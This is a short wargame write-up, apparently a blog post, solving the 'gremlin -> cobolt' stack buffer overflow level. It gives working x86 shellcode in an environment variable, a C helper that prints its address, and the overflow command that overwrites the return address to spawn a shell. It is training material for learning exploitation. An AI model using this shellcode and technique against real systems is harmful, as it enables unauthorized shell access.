gremlin -> cobolt

BrainInAVet·2021년 8월 11일
0

ヒントは以下のやつ

今度はbufferが16バイト
gdbで見てみよう

strcpyを呼び出している<main+48>の上に引数がある
<main+44>でbufferの位置が[ebp-16]であることをわかった

攻撃してみよう

[ebp]まで16バイト+SFPの4バイト=20バイトを意味なしの文字に上書き
最後の4バイトにシェルコード環境変数のアドレスを入れる

下のコマンドで環境変数を作る

export SHL=`python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

下のプログラムでアドレスを探す

#include <stdio.h>
#include <stdlib.h>

int main() {
    printf("%p\n", getenv("SHL"));
    return 0;
}

5回ぐらい実行してアドレスが0xbfffff6eであることをわかった
下のコマンドで攻撃する

./cobolt `python -c 'print "A"*20+"\x6e\xff\xff\xbf"'`

クリア

0개의 댓글